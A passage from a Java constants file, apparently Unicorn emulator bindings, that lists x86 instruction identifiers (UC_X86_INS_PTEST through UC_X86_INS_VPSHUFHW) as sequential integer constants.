static final int UC_X86_INS_PTEST = 589; public static final int UC_X86_INS_PUNPCKHQDQ = 590; public static final int UC_X86_INS_PUNPCKLQDQ = 591; public static final int UC_X86_INS_PUSH = 592; public static final int UC_X86_INS_PUSHAW = 593; public static final int UC_X86_INS_PUSHAL = 594; public static final int UC_X86_INS_PUSHF = 595; public static final int UC_X86_INS_PUSHFD = 596; public static final int UC_X86_INS_PUSHFQ = 597; public static final int UC_X86_INS_RCL = 598; public static final int UC_X86_INS_RCPPS = 599; public static final int UC_X86_INS_RCPSS = 600; public static final int UC_X86_INS_RCR = 601; public static final int UC_X86_INS_RDFSBASE = 602; public static final int UC_X86_INS_RDGSBASE = 603; public static final int UC_X86_INS_RDMSR = 604; public static final int UC_X86_INS_RDPMC = 605; public static final int UC_X86_INS_RDRAND = 606; public static final int UC_X86_INS_RDSEED = 607; public static final int UC_X86_INS_RDTSC = 608; public static final int UC_X86_INS_RDTSCP = 609; public static final int UC_X86_INS_ROL = 610; public static final int UC_X86_INS_ROR = 611; public static final int UC_X86_INS_RORX = 612; public static final int UC_X86_INS_ROUNDPD = 613; public static final int UC_X86_INS_ROUNDPS = 614; public static final int UC_X86_INS_ROUNDSD = 615; public static final int UC_X86_INS_ROUNDSS = 616; public static final int UC_X86_INS_RSM = 617; public static final int UC_X86_INS_RSQRTPS = 618; public static final int UC_X86_INS_RSQRTSS = 619; public static final int UC_X86_INS_SAHF = 620; public static final int UC_X86_INS_SAL = 621; public static final int UC_X86_INS_SALC = 622; public static final int UC_X86_INS_SAR = 623; public static final int UC_X86_INS_SARX = 624; public static final int UC_X86_INS_SBB = 625; public static final int UC_X86_INS_SCASB = 626; public static final int UC_X86_INS_SCASD = 627; public static final int UC_X86_INS_SCASQ = 628; public static final int UC_X86_INS_SCASW = 629; public static final int UC_X86_INS_SETAE = 630; public static final int UC_X86_INS_SETA = 631; public static final int UC_X86_INS_SETBE = 632; public static final int UC_X86_INS_SETB = 633; public static final int UC_X86_INS_SETE = 634; public static final int UC_X86_INS_SETGE = 635; public static final int UC_X86_INS_SETG = 636; public static final int UC_X86_INS_SETLE = 637; public static final int UC_X86_INS_SETL = 638; public static final int UC_X86_INS_SETNE = 639; public static final int UC_X86_INS_SETNO = 640; public static final int UC_X86_INS_SETNP = 641; public static final int UC_X86_INS_SETNS = 642; public static final int UC_X86_INS_SETO = 643; public static final int UC_X86_INS_SETP = 644; public static final int UC_X86_INS_SETS = 645; public static final int UC_X86_INS_SFENCE = 646; public static final int UC_X86_INS_SGDT = 647; public static final int UC_X86_INS_SHA1MSG1 = 648; public static final int UC_X86_INS_SHA1MSG2 = 649; public static final int UC_X86_INS_SHA1NEXTE = 650; public static final int UC_X86_INS_SHA1RNDS4 = 651; public static final int UC_X86_INS_SHA256MSG1 = 652; public static final int UC_X86_INS_SHA256MSG2 = 653; public static final int UC_X86_INS_SHA256RNDS2 = 654; public static final int UC_X86_INS_SHL = 655; public static final int UC_X86_INS_SHLD = 656; public static final int UC_X86_INS_SHLX = 657; public static final int UC_X86_INS_SHR = 658; public static final int UC_X86_INS_SHRD = 659; public static final int UC_X86_INS_SHRX = 660; public static final int UC_X86_INS_SHUFPD = 661; public static final int 
UC_X86_INS_SHUFPS = 662; public static final int UC_X86_INS_SIDT = 663; public static final int UC_X86_INS_FSIN = 664; public static final int UC_X86_INS_SKINIT = 665; public static final int UC_X86_INS_SLDT = 666; public static final int UC_X86_INS_SMSW = 667; public static final int UC_X86_INS_SQRTPD = 668; public static final int UC_X86_INS_SQRTPS = 669; public static final int UC_X86_INS_SQRTSD = 670; public static final int UC_X86_INS_SQRTSS = 671; public static final int UC_X86_INS_FSQRT = 672; public static final int UC_X86_INS_STAC = 673; public static final int UC_X86_INS_STC = 674; public static final int UC_X86_INS_STD = 675; public static final int UC_X86_INS_STGI = 676; public static final int UC_X86_INS_STI = 677; public static final int UC_X86_INS_STMXCSR = 678; public static final int UC_X86_INS_STOSB = 679; public static final int UC_X86_INS_STOSD = 680; public static final int UC_X86_INS_STOSQ = 681; public static final int UC_X86_INS_STOSW = 682; public static final int UC_X86_INS_STR = 683; public static final int UC_X86_INS_FST = 684; public static final int UC_X86_INS_FSTP = 685; public static final int UC_X86_INS_FSTPNCE = 686; public static final int UC_X86_INS_FXCH = 687; public static final int UC_X86_INS_SUBPD = 688; public static final int UC_X86_INS_SUBPS = 689; public static final int UC_X86_INS_FSUBR = 690; public static final int UC_X86_INS_FISUBR = 691; public static final int UC_X86_INS_FSUBRP = 692; public static final int UC_X86_INS_SUBSD = 693; public static final int UC_X86_INS_SUBSS = 694; public static final int UC_X86_INS_FSUB = 695; public static final int UC_X86_INS_FISUB = 696; public static final int UC_X86_INS_FSUBP = 697; public static final int UC_X86_INS_SWAPGS = 698; public static final int UC_X86_INS_SYSCALL = 699; public static final int UC_X86_INS_SYSENTER = 700; public static final int UC_X86_INS_SYSEXIT = 701; public static final int UC_X86_INS_SYSRET = 702; public static final int UC_X86_INS_T1MSKC = 703; public static final int UC_X86_INS_TEST = 704; public static final int UC_X86_INS_UD2 = 705; public static final int UC_X86_INS_FTST = 706; public static final int UC_X86_INS_TZCNT = 707; public static final int UC_X86_INS_TZMSK = 708; public static final int UC_X86_INS_FUCOMPI = 709; public static final int UC_X86_INS_FUCOMI = 710; public static final int UC_X86_INS_FUCOMPP = 711; public static final int UC_X86_INS_FUCOMP = 712; public static final int UC_X86_INS_FUCOM = 713; public static final int UC_X86_INS_UD2B = 714; public static final int UC_X86_INS_UNPCKHPD = 715; public static final int UC_X86_INS_UNPCKHPS = 716; public static final int UC_X86_INS_UNPCKLPD = 717; public static final int UC_X86_INS_UNPCKLPS = 718; public static final int UC_X86_INS_VADDPD = 719; public static final int UC_X86_INS_VADDPS = 720; public static final int UC_X86_INS_VADDSD = 721; public static final int UC_X86_INS_VADDSS = 722; public static final int UC_X86_INS_VADDSUBPD = 723; public static final int UC_X86_INS_VADDSUBPS = 724; public static final int UC_X86_INS_VAESDECLAST = 725; public static final int UC_X86_INS_VAESDEC = 726; public static final int UC_X86_INS_VAESENCLAST = 727; public static final int UC_X86_INS_VAESENC = 728; public static final int UC_X86_INS_VAESIMC = 729; public static final int UC_X86_INS_VAESKEYGENASSIST = 730; public static final int UC_X86_INS_VALIGND = 731; public static final int UC_X86_INS_VALIGNQ = 732; public static final int UC_X86_INS_VANDNPD = 733; public static final int UC_X86_INS_VANDNPS = 734; public 
static final int UC_X86_INS_VANDPD = 735; public static final int UC_X86_INS_VANDPS = 736; public static final int UC_X86_INS_VBLENDMPD = 737; public static final int UC_X86_INS_VBLENDMPS = 738; public static final int UC_X86_INS_VBLENDPD = 739; public static final int UC_X86_INS_VBLENDPS = 740; public static final int UC_X86_INS_VBLENDVPD = 741; public static final int UC_X86_INS_VBLENDVPS = 742; public static final int UC_X86_INS_VBROADCASTF128 = 743; public static final int UC_X86_INS_VBROADCASTI32X4 = 744; public static final int UC_X86_INS_VBROADCASTI64X4 = 745; public static final int UC_X86_INS_VBROADCASTSD = 746; public static final int UC_X86_INS_VBROADCASTSS = 747; public static final int UC_X86_INS_VCMPPD = 748; public static final int UC_X86_INS_VCMPPS = 749; public static final int UC_X86_INS_VCMPSD = 750; public static final int UC_X86_INS_VCMPSS = 751; public static final int UC_X86_INS_VCOMPRESSPD = 752; public static final int UC_X86_INS_VCOMPRESSPS = 753; public static final int UC_X86_INS_VCVTDQ2PD = 754; public static final int UC_X86_INS_VCVTDQ2PS = 755; public static final int UC_X86_INS_VCVTPD2DQX = 756; public static final int UC_X86_INS_VCVTPD2DQ = 757; public static final int UC_X86_INS_VCVTPD2PSX = 758; public static final int UC_X86_INS_VCVTPD2PS = 759; public static final int UC_X86_INS_VCVTPD2UDQ = 760; public static final int UC_X86_INS_VCVTPH2PS = 761; public static final int UC_X86_INS_VCVTPS2DQ = 762; public static final int UC_X86_INS_VCVTPS2PD = 763; public static final int UC_X86_INS_VCVTPS2PH = 764; public static final int UC_X86_INS_VCVTPS2UDQ = 765; public static final int UC_X86_INS_VCVTSD2SI = 766; public static final int UC_X86_INS_VCVTSD2USI = 767; public static final int UC_X86_INS_VCVTSS2SI = 768; public static final int UC_X86_INS_VCVTSS2USI = 769; public static final int UC_X86_INS_VCVTTPD2DQX = 770; public static final int UC_X86_INS_VCVTTPD2DQ = 771; public static final int UC_X86_INS_VCVTTPD2UDQ = 772; public static final int UC_X86_INS_VCVTTPS2DQ = 773; public static final int UC_X86_INS_VCVTTPS2UDQ = 774; public static final int UC_X86_INS_VCVTUDQ2PD = 775; public static final int UC_X86_INS_VCVTUDQ2PS = 776; public static final int UC_X86_INS_VDIVPD = 777; public static final int UC_X86_INS_VDIVPS = 778; public static final int UC_X86_INS_VDIVSD = 779; public static final int UC_X86_INS_VDIVSS = 780; public static final int UC_X86_INS_VDPPD = 781; public static final int UC_X86_INS_VDPPS = 782; public static final int UC_X86_INS_VERR = 783; public static final int UC_X86_INS_VERW = 784; public static final int UC_X86_INS_VEXP2PD = 785; public static final int UC_X86_INS_VEXP2PS = 786; public static final int UC_X86_INS_VEXPANDPD = 787; public static final int UC_X86_INS_VEXPANDPS = 788; public static final int UC_X86_INS_VEXTRACTF128 = 789; public static final int UC_X86_INS_VEXTRACTF32X4 = 790; public static final int UC_X86_INS_VEXTRACTF64X4 = 791; public static final int UC_X86_INS_VEXTRACTI128 = 792; public static final int UC_X86_INS_VEXTRACTI32X4 = 793; public static final int UC_X86_INS_VEXTRACTI64X4 = 794; public static final int UC_X86_INS_VEXTRACTPS = 795; public static final int UC_X86_INS_VFMADD132PD = 796; public static final int UC_X86_INS_VFMADD132PS = 797; public static final int UC_X86_INS_VFMADDPD = 798; public static final int UC_X86_INS_VFMADD213PD = 799; public static final int UC_X86_INS_VFMADD231PD = 800; public static final int UC_X86_INS_VFMADDPS = 801; public static final int UC_X86_INS_VFMADD213PS = 802; 
public static final int UC_X86_INS_VFMADD231PS = 803; public static final int UC_X86_INS_VFMADDSD = 804; public static final int UC_X86_INS_VFMADD213SD = 805; public static final int UC_X86_INS_VFMADD132SD = 806; public static final int UC_X86_INS_VFMADD231SD = 807; public static final int UC_X86_INS_VFMADDSS = 808; public static final int UC_X86_INS_VFMADD213SS = 809; public static final int UC_X86_INS_VFMADD132SS = 810; public static final int UC_X86_INS_VFMADD231SS = 811; public static final int UC_X86_INS_VFMADDSUB132PD = 812; public static final int UC_X86_INS_VFMADDSUB132PS = 813; public static final int UC_X86_INS_VFMADDSUBPD = 814; public static final int UC_X86_INS_VFMADDSUB213PD = 815; public static final int UC_X86_INS_VFMADDSUB231PD = 816; public static final int UC_X86_INS_VFMADDSUBPS = 817; public static final int UC_X86_INS_VFMADDSUB213PS = 818; public static final int UC_X86_INS_VFMADDSUB231PS = 819; public static final int UC_X86_INS_VFMSUB132PD = 820; public static final int UC_X86_INS_VFMSUB132PS = 821; public static final int UC_X86_INS_VFMSUBADD132PD = 822; public static final int UC_X86_INS_VFMSUBADD132PS = 823; public static final int UC_X86_INS_VFMSUBADDPD = 824; public static final int UC_X86_INS_VFMSUBADD213PD = 825; public static final int UC_X86_INS_VFMSUBADD231PD = 826; public static final int UC_X86_INS_VFMSUBADDPS = 827; public static final int UC_X86_INS_VFMSUBADD213PS = 828; public static final int UC_X86_INS_VFMSUBADD231PS = 829; public static final int UC_X86_INS_VFMSUBPD = 830; public static final int UC_X86_INS_VFMSUB213PD = 831; public static final int UC_X86_INS_VFMSUB231PD = 832; public static final int UC_X86_INS_VFMSUBPS = 833; public static final int UC_X86_INS_VFMSUB213PS = 834; public static final int UC_X86_INS_VFMSUB231PS = 835; public static final int UC_X86_INS_VFMSUBSD = 836; public static final int UC_X86_INS_VFMSUB213SD = 837; public static final int UC_X86_INS_VFMSUB132SD = 838; public static final int UC_X86_INS_VFMSUB231SD = 839; public static final int UC_X86_INS_VFMSUBSS = 840; public static final int UC_X86_INS_VFMSUB213SS = 841; public static final int UC_X86_INS_VFMSUB132SS = 842; public static final int UC_X86_INS_VFMSUB231SS = 843; public static final int UC_X86_INS_VFNMADD132PD = 844; public static final int UC_X86_INS_VFNMADD132PS = 845; public static final int UC_X86_INS_VFNMADDPD = 846; public static final int UC_X86_INS_VFNMADD213PD = 847; public static final int UC_X86_INS_VFNMADD231PD = 848; public static final int UC_X86_INS_VFNMADDPS = 849; public static final int UC_X86_INS_VFNMADD213PS = 850; public static final int UC_X86_INS_VFNMADD231PS = 851; public static final int UC_X86_INS_VFNMADDSD = 852; public static final int UC_X86_INS_VFNMADD213SD = 853; public static final int UC_X86_INS_VFNMADD132SD = 854; public static final int UC_X86_INS_VFNMADD231SD = 855; public static final int UC_X86_INS_VFNMADDSS = 856; public static final int UC_X86_INS_VFNMADD213SS = 857; public static final int UC_X86_INS_VFNMADD132SS = 858; public static final int UC_X86_INS_VFNMADD231SS = 859; public static final int UC_X86_INS_VFNMSUB132PD = 860; public static final int UC_X86_INS_VFNMSUB132PS = 861; public static final int UC_X86_INS_VFNMSUBPD = 862; public static final int UC_X86_INS_VFNMSUB213PD = 863; public static final int UC_X86_INS_VFNMSUB231PD = 864; public static final int UC_X86_INS_VFNMSUBPS = 865; public static final int UC_X86_INS_VFNMSUB213PS = 866; public static final int UC_X86_INS_VFNMSUB231PS = 867; public static final 
int UC_X86_INS_VFNMSUBSD = 868; public static final int UC_X86_INS_VFNMSUB213SD = 869; public static final int UC_X86_INS_VFNMSUB132SD = 870; public static final int UC_X86_INS_VFNMSUB231SD = 871; public static final int UC_X86_INS_VFNMSUBSS = 872; public static final int UC_X86_INS_VFNMSUB213SS = 873; public static final int UC_X86_INS_VFNMSUB132SS = 874; public static final int UC_X86_INS_VFNMSUB231SS = 875; public static final int UC_X86_INS_VFRCZPD = 876; public static final int UC_X86_INS_VFRCZPS = 877; public static final int UC_X86_INS_VFRCZSD = 878; public static final int UC_X86_INS_VFRCZSS = 879; public static final int UC_X86_INS_VORPD = 880; public static final int UC_X86_INS_VORPS = 881; public static final int UC_X86_INS_VXORPD = 882; public static final int UC_X86_INS_VXORPS = 883; public static final int UC_X86_INS_VGATHERDPD = 884; public static final int UC_X86_INS_VGATHERDPS = 885; public static final int UC_X86_INS_VGATHERPF0DPD = 886; public static final int UC_X86_INS_VGATHERPF0DPS = 887; public static final int UC_X86_INS_VGATHERPF0QPD = 888; public static final int UC_X86_INS_VGATHERPF0QPS = 889; public static final int UC_X86_INS_VGATHERPF1DPD = 890; public static final int UC_X86_INS_VGATHERPF1DPS = 891; public static final int UC_X86_INS_VGATHERPF1QPD = 892; public static final int UC_X86_INS_VGATHERPF1QPS = 893; public static final int UC_X86_INS_VGATHERQPD = 894; public static final int UC_X86_INS_VGATHERQPS = 895; public static final int UC_X86_INS_VHADDPD = 896; public static final int UC_X86_INS_VHADDPS = 897; public static final int UC_X86_INS_VHSUBPD = 898; public static final int UC_X86_INS_VHSUBPS = 899; public static final int UC_X86_INS_VINSERTF128 = 900; public static final int UC_X86_INS_VINSERTF32X4 = 901; public static final int UC_X86_INS_VINSERTF32X8 = 902; public static final int UC_X86_INS_VINSERTF64X2 = 903; public static final int UC_X86_INS_VINSERTF64X4 = 904; public static final int UC_X86_INS_VINSERTI128 = 905; public static final int UC_X86_INS_VINSERTI32X4 = 906; public static final int UC_X86_INS_VINSERTI32X8 = 907; public static final int UC_X86_INS_VINSERTI64X2 = 908; public static final int UC_X86_INS_VINSERTI64X4 = 909; public static final int UC_X86_INS_VINSERTPS = 910; public static final int UC_X86_INS_VLDDQU = 911; public static final int UC_X86_INS_VLDMXCSR = 912; public static final int UC_X86_INS_VMASKMOVDQU = 913; public static final int UC_X86_INS_VMASKMOVPD = 914; public static final int UC_X86_INS_VMASKMOVPS = 915; public static final int UC_X86_INS_VMAXPD = 916; public static final int UC_X86_INS_VMAXPS = 917; public static final int UC_X86_INS_VMAXSD = 918; public static final int UC_X86_INS_VMAXSS = 919; public static final int UC_X86_INS_VMCALL = 920; public static final int UC_X86_INS_VMCLEAR = 921; public static final int UC_X86_INS_VMFUNC = 922; public static final int UC_X86_INS_VMINPD = 923; public static final int UC_X86_INS_VMINPS = 924; public static final int UC_X86_INS_VMINSD = 925; public static final int UC_X86_INS_VMINSS = 926; public static final int UC_X86_INS_VMLAUNCH = 927; public static final int UC_X86_INS_VMLOAD = 928; public static final int UC_X86_INS_VMMCALL = 929; public static final int UC_X86_INS_VMOVQ = 930; public static final int UC_X86_INS_VMOVDDUP = 931; public static final int UC_X86_INS_VMOVD = 932; public static final int UC_X86_INS_VMOVDQA32 = 933; public static final int UC_X86_INS_VMOVDQA64 = 934; public static final int UC_X86_INS_VMOVDQA = 935; public static final int 
UC_X86_INS_VMOVDQU16 = 936; public static final int UC_X86_INS_VMOVDQU32 = 937; public static final int UC_X86_INS_VMOVDQU64 = 938; public static final int UC_X86_INS_VMOVDQU8 = 939; public static final int UC_X86_INS_VMOVDQU = 940; public static final int UC_X86_INS_VMOVHLPS = 941; public static final int UC_X86_INS_VMOVHPD = 942; public static final int UC_X86_INS_VMOVHPS = 943; public static final int UC_X86_INS_VMOVLHPS = 944; public static final int UC_X86_INS_VMOVLPD = 945; public static final int UC_X86_INS_VMOVLPS = 946; public static final int UC_X86_INS_VMOVMSKPD = 947; public static final int UC_X86_INS_VMOVMSKPS = 948; public static final int UC_X86_INS_VMOVNTDQA = 949; public static final int UC_X86_INS_VMOVNTDQ = 950; public static final int UC_X86_INS_VMOVNTPD = 951; public static final int UC_X86_INS_VMOVNTPS = 952; public static final int UC_X86_INS_VMOVSD = 953; public static final int UC_X86_INS_VMOVSHDUP = 954; public static final int UC_X86_INS_VMOVSLDUP = 955; public static final int UC_X86_INS_VMOVSS = 956; public static final int UC_X86_INS_VMOVUPD = 957; public static final int UC_X86_INS_VMOVUPS = 958; public static final int UC_X86_INS_VMPSADBW = 959; public static final int UC_X86_INS_VMPTRLD = 960; public static final int UC_X86_INS_VMPTRST = 961; public static final int UC_X86_INS_VMREAD = 962; public static final int UC_X86_INS_VMRESUME = 963; public static final int UC_X86_INS_VMRUN = 964; public static final int UC_X86_INS_VMSAVE = 965; public static final int UC_X86_INS_VMULPD = 966; public static final int UC_X86_INS_VMULPS = 967; public static final int UC_X86_INS_VMULSD = 968; public static final int UC_X86_INS_VMULSS = 969; public static final int UC_X86_INS_VMWRITE = 970; public static final int UC_X86_INS_VMXOFF = 971; public static final int UC_X86_INS_VMXON = 972; public static final int UC_X86_INS_VPABSB = 973; public static final int UC_X86_INS_VPABSD = 974; public static final int UC_X86_INS_VPABSQ = 975; public static final int UC_X86_INS_VPABSW = 976; public static final int UC_X86_INS_VPACKSSDW = 977; public static final int UC_X86_INS_VPACKSSWB = 978; public static final int UC_X86_INS_VPACKUSDW = 979; public static final int UC_X86_INS_VPACKUSWB = 980; public static final int UC_X86_INS_VPADDB = 981; public static final int UC_X86_INS_VPADDD = 982; public static final int UC_X86_INS_VPADDQ = 983; public static final int UC_X86_INS_VPADDSB = 984; public static final int UC_X86_INS_VPADDSW = 985; public static final int UC_X86_INS_VPADDUSB = 986; public static final int UC_X86_INS_VPADDUSW = 987; public static final int UC_X86_INS_VPADDW = 988; public static final int UC_X86_INS_VPALIGNR = 989; public static final int UC_X86_INS_VPANDD = 990; public static final int UC_X86_INS_VPANDND = 991; public static final int UC_X86_INS_VPANDNQ = 992; public static final int UC_X86_INS_VPANDN = 993; public static final int UC_X86_INS_VPANDQ = 994; public static final int UC_X86_INS_VPAND = 995; public static final int UC_X86_INS_VPAVGB = 996; public static final int UC_X86_INS_VPAVGW = 997; public static final int UC_X86_INS_VPBLENDD = 998; public static final int UC_X86_INS_VPBLENDMB = 999; public static final int UC_X86_INS_VPBLENDMD = 1000; public static final int UC_X86_INS_VPBLENDMQ = 1001; public static final int UC_X86_INS_VPBLENDMW = 1002; public static final int UC_X86_INS_VPBLENDVB = 1003; public static final int UC_X86_INS_VPBLENDW = 1004; public static final int UC_X86_INS_VPBROADCASTB = 1005; public static final int UC_X86_INS_VPBROADCASTD 
= 1006; public static final int UC_X86_INS_VPBROADCASTMB2Q = 1007; public static final int UC_X86_INS_VPBROADCASTMW2D = 1008; public static final int UC_X86_INS_VPBROADCASTQ = 1009; public static final int UC_X86_INS_VPBROADCASTW = 1010; public static final int UC_X86_INS_VPCLMULQDQ = 1011; public static final int UC_X86_INS_VPCMOV = 1012; public static final int UC_X86_INS_VPCMPB = 1013; public static final int UC_X86_INS_VPCMPD = 1014; public static final int UC_X86_INS_VPCMPEQB = 1015; public static final int UC_X86_INS_VPCMPEQD = 1016; public static final int UC_X86_INS_VPCMPEQQ = 1017; public static final int UC_X86_INS_VPCMPEQW = 1018; public static final int UC_X86_INS_VPCMPESTRI = 1019; public static final int UC_X86_INS_VPCMPESTRM = 1020; public static final int UC_X86_INS_VPCMPGTB = 1021; public static final int UC_X86_INS_VPCMPGTD = 1022; public static final int UC_X86_INS_VPCMPGTQ = 1023; public static final int UC_X86_INS_VPCMPGTW = 1024; public static final int UC_X86_INS_VPCMPISTRI = 1025; public static final int UC_X86_INS_VPCMPISTRM = 1026; public static final int UC_X86_INS_VPCMPQ = 1027; public static final int UC_X86_INS_VPCMPUB = 1028; public static final int UC_X86_INS_VPCMPUD = 1029; public static final int UC_X86_INS_VPCMPUQ = 1030; public static final int UC_X86_INS_VPCMPUW = 1031; public static final int UC_X86_INS_VPCMPW = 1032; public static final int UC_X86_INS_VPCOMB = 1033; public static final int UC_X86_INS_VPCOMD = 1034; public static final int UC_X86_INS_VPCOMPRESSD = 1035; public static final int UC_X86_INS_VPCOMPRESSQ = 1036; public static final int UC_X86_INS_VPCOMQ = 1037; public static final int UC_X86_INS_VPCOMUB = 1038; public static final int UC_X86_INS_VPCOMUD = 1039; public static final int UC_X86_INS_VPCOMUQ = 1040; public static final int UC_X86_INS_VPCOMUW = 1041; public static final int UC_X86_INS_VPCOMW = 1042; public static final int UC_X86_INS_VPCONFLICTD = 1043; public static final int UC_X86_INS_VPCONFLICTQ = 1044; public static final int UC_X86_INS_VPERM2F128 = 1045; public static final int UC_X86_INS_VPERM2I128 = 1046; public static final int UC_X86_INS_VPERMD = 1047; public static final int UC_X86_INS_VPERMI2D = 1048; public static final int UC_X86_INS_VPERMI2PD = 1049; public static final int UC_X86_INS_VPERMI2PS = 1050; public static final int UC_X86_INS_VPERMI2Q = 1051; public static final int UC_X86_INS_VPERMIL2PD = 1052; public static final int UC_X86_INS_VPERMIL2PS = 1053; public static final int UC_X86_INS_VPERMILPD = 1054; public static final int UC_X86_INS_VPERMILPS = 1055; public static final int UC_X86_INS_VPERMPD = 1056; public static final int UC_X86_INS_VPERMPS = 1057; public static final int UC_X86_INS_VPERMQ = 1058; public static final int UC_X86_INS_VPERMT2D = 1059; public static final int UC_X86_INS_VPERMT2PD = 1060; public static final int UC_X86_INS_VPERMT2PS = 1061; public static final int UC_X86_INS_VPERMT2Q = 1062; public static final int UC_X86_INS_VPEXPANDD = 1063; public static final int UC_X86_INS_VPEXPANDQ = 1064; public static final int UC_X86_INS_VPEXTRB = 1065; public static final int UC_X86_INS_VPEXTRD = 1066; public static final int UC_X86_INS_VPEXTRQ = 1067; public static final int UC_X86_INS_VPEXTRW = 1068; public static final int UC_X86_INS_VPGATHERDD = 1069; public static final int UC_X86_INS_VPGATHERDQ = 1070; public static final int UC_X86_INS_VPGATHERQD = 1071; public static final int UC_X86_INS_VPGATHERQQ = 1072; public static final int UC_X86_INS_VPHADDBD = 1073; public static final int 
UC_X86_INS_VPHADDBQ = 1074; public static final int UC_X86_INS_VPHADDBW = 1075; public static final int UC_X86_INS_VPHADDDQ = 1076; public static final int UC_X86_INS_VPHADDD = 1077; public static final int UC_X86_INS_VPHADDSW = 1078; public static final int UC_X86_INS_VPHADDUBD = 1079; public static final int UC_X86_INS_VPHADDUBQ = 1080; public static final int UC_X86_INS_VPHADDUBW = 1081; public static final int UC_X86_INS_VPHADDUDQ = 1082; public static final int UC_X86_INS_VPHADDUWD = 1083; public static final int UC_X86_INS_VPHADDUWQ = 1084; public static final int UC_X86_INS_VPHADDWD = 1085; public static final int UC_X86_INS_VPHADDWQ = 1086; public static final int UC_X86_INS_VPHADDW = 1087; public static final int UC_X86_INS_VPHMINPOSUW = 1088; public static final int UC_X86_INS_VPHSUBBW = 1089; public static final int UC_X86_INS_VPHSUBDQ = 1090; public static final int UC_X86_INS_VPHSUBD = 1091; public static final int UC_X86_INS_VPHSUBSW = 1092; public static final int UC_X86_INS_VPHSUBWD = 1093; public static final int UC_X86_INS_VPHSUBW = 1094; public static final int UC_X86_INS_VPINSRB = 1095; public static final int UC_X86_INS_VPINSRD = 1096; public static final int UC_X86_INS_VPINSRQ = 1097; public static final int UC_X86_INS_VPINSRW = 1098; public static final int UC_X86_INS_VPLZCNTD = 1099; public static final int UC_X86_INS_VPLZCNTQ = 1100; public static final int UC_X86_INS_VPMACSDD = 1101; public static final int UC_X86_INS_VPMACSDQH = 1102; public static final int UC_X86_INS_VPMACSDQL = 1103; public static final int UC_X86_INS_VPMACSSDD = 1104; public static final int UC_X86_INS_VPMACSSDQH = 1105; public static final int UC_X86_INS_VPMACSSDQL = 1106; public static final int UC_X86_INS_VPMACSSWD = 1107; public static final int UC_X86_INS_VPMACSSWW = 1108; public static final int UC_X86_INS_VPMACSWD = 1109; public static final int UC_X86_INS_VPMACSWW = 1110; public static final int UC_X86_INS_VPMADCSSWD = 1111; public static final int UC_X86_INS_VPMADCSWD = 1112; public static final int UC_X86_INS_VPMADDUBSW = 1113; public static final int UC_X86_INS_VPMADDWD = 1114; public static final int UC_X86_INS_VPMASKMOVD = 1115; public static final int UC_X86_INS_VPMASKMOVQ = 1116; public static final int UC_X86_INS_VPMAXSB = 1117; public static final int UC_X86_INS_VPMAXSD = 1118; public static final int UC_X86_INS_VPMAXSQ = 1119; public static final int UC_X86_INS_VPMAXSW = 1120; public static final int UC_X86_INS_VPMAXUB = 1121; public static final int UC_X86_INS_VPMAXUD = 1122; public static final int UC_X86_INS_VPMAXUQ = 1123; public static final int UC_X86_INS_VPMAXUW = 1124; public static final int UC_X86_INS_VPMINSB = 1125; public static final int UC_X86_INS_VPMINSD = 1126; public static final int UC_X86_INS_VPMINSQ = 1127; public static final int UC_X86_INS_VPMINSW = 1128; public static final int UC_X86_INS_VPMINUB = 1129; public static final int UC_X86_INS_VPMINUD = 1130; public static final int UC_X86_INS_VPMINUQ = 1131; public static final int UC_X86_INS_VPMINUW = 1132; public static final int UC_X86_INS_VPMOVDB = 1133; public static final int UC_X86_INS_VPMOVDW = 1134; public static final int UC_X86_INS_VPMOVM2B = 1135; public static final int UC_X86_INS_VPMOVM2D = 1136; public static final int UC_X86_INS_VPMOVM2Q = 1137; public static final int UC_X86_INS_VPMOVM2W = 1138; public static final int UC_X86_INS_VPMOVMSKB = 1139; public static final int UC_X86_INS_VPMOVQB = 1140; public static final int UC_X86_INS_VPMOVQD = 1141; public static final int UC_X86_INS_VPMOVQW 
= 1142; public static final int UC_X86_INS_VPMOVSDB = 1143; public static final int UC_X86_INS_VPMOVSDW = 1144; public static final int UC_X86_INS_VPMOVSQB = 1145; public static final int UC_X86_INS_VPMOVSQD = 1146; public static final int UC_X86_INS_VPMOVSQW = 1147; public static final int UC_X86_INS_VPMOVSXBD = 1148; public static final int UC_X86_INS_VPMOVSXBQ = 1149; public static final int UC_X86_INS_VPMOVSXBW = 1150; public static final int UC_X86_INS_VPMOVSXDQ = 1151; public static final int UC_X86_INS_VPMOVSXWD = 1152; public static final int UC_X86_INS_VPMOVSXWQ = 1153; public static final int UC_X86_INS_VPMOVUSDB = 1154; public static final int UC_X86_INS_VPMOVUSDW = 1155; public static final int UC_X86_INS_VPMOVUSQB = 1156; public static final int UC_X86_INS_VPMOVUSQD = 1157; public static final int UC_X86_INS_VPMOVUSQW = 1158; public static final int UC_X86_INS_VPMOVZXBD = 1159; public static final int UC_X86_INS_VPMOVZXBQ = 1160; public static final int UC_X86_INS_VPMOVZXBW = 1161; public static final int UC_X86_INS_VPMOVZXDQ = 1162; public static final int UC_X86_INS_VPMOVZXWD = 1163; public static final int UC_X86_INS_VPMOVZXWQ = 1164; public static final int UC_X86_INS_VPMULDQ = 1165; public static final int UC_X86_INS_VPMULHRSW = 1166; public static final int UC_X86_INS_VPMULHUW = 1167; public static final int UC_X86_INS_VPMULHW = 1168; public static final int UC_X86_INS_VPMULLD = 1169; public static final int UC_X86_INS_VPMULLQ = 1170; public static final int UC_X86_INS_VPMULLW = 1171; public static final int UC_X86_INS_VPMULUDQ = 1172; public static final int UC_X86_INS_VPORD = 1173; public static final int UC_X86_INS_VPORQ = 1174; public static final int UC_X86_INS_VPOR = 1175; public static final int UC_X86_INS_VPPERM = 1176; public static final int UC_X86_INS_VPROTB = 1177; public static final int UC_X86_INS_VPROTD = 1178; public static final int UC_X86_INS_VPROTQ = 1179; public static final int UC_X86_INS_VPROTW = 1180; public static final int UC_X86_INS_VPSADBW = 1181; public static final int UC_X86_INS_VPSCATTERDD = 1182; public static final int UC_X86_INS_VPSCATTERDQ = 1183; public static final int UC_X86_INS_VPSCATTERQD = 1184; public static final int UC_X86_INS_VPSCATTERQQ = 1185; public static final int UC_X86_INS_VPSHAB = 1186; public static final int UC_X86_INS_VPSHAD = 1187; public static final int UC_X86_INS_VPSHAQ = 1188; public static final int UC_X86_INS_VPSHAW = 1189; public static final int UC_X86_INS_VPSHLB = 1190; public static final int UC_X86_INS_VPSHLD = 1191; public static final int UC_X86_INS_VPSHLQ = 1192; public static final int UC_X86_INS_VPSHLW = 1193; public static final int UC_X86_INS_VPSHUFB = 1194; public static final int UC_X86_INS_VPSHUFD = 1195; public static final int UC_X86_INS_VPSHUFHW = 1196; public static final int UC_X86_INS_VPSHUFLW 